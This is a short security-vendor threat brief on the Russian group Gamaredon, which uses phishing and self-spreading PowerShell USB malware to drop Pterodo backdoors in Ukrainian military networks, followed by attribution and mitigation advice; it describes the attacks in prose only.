Skip Navigation

June 15, 2023 |

Russian hackers use PowerShell USB malware to drop backdoors

Loading table of contents...

Source: Bleeping Computer

Summary

The Russian state-sponsored hacking group known as Gamaredon continues to target Ukraine’s military and security intelligence sectors with updated TTPs. In addition to its use of information stealers and default Word template hijackers, Gamaredon is now using USB malware to help spread to additional systems inside infected networks.

Gamaredon continues to rely primarily on phishing emails for initial access. Once opened, the attachment launches a PowerShell command that downloads a 'Pterodo' payload from the attacker's (C2) server. The PowerShell script also enumerates all drives on the computer and copies itself to any removable USB disks found attached to the device.

Analysis

The use of USB malware is not novel. However, it remains an effective way to propagate through a victim’s network as the malware is designed to install itself onto any device the USB disk is inserted into. It also has the added benefit of being able to jump air-gapped networks, which would typically be used by the military and intelligence organizations that Gamaredon usually targets.

In 2021, Ukraine’s intelligence service, the SBU, publicly attributed Gamaredon to the Crimea-based branch of Russia’s Federal Security Service (FSB). They added that Gamaredon has carried out more than 5,000 attacks against Ukrainian entities, targeting critical infrastructure such as power plants and water facilities, harvesting classified information from government agencies, conducting misinformation campaigns, and disrupting IT systems.

Mitigation

Field Effect recommends that governments and organizations in Ukraine, and those in support of Ukraine, adopt a heightened security posture towards cybersecurity given the threat posed by Russian state-sponsored cyber actors such as Gamaredon. We encourage all organizations to review the U.S. Cybersecurity & Infrastructure Security Agency (CISA) ShieldsUp program, which provides robust guidance for preparing, responding to, and mitigating the impacts of Russian state-sponsored cyber attacks.

Field Effect’s elite team of Security Intelligence professionals constantly monitor the cyber threat landscape for novel TTPs and IoCs associated with nation-state-sponsored groups such as Gamaredon. This research contributes to the timely deployment of signatures into Covalence to detect and mitigate threat activity.

Further references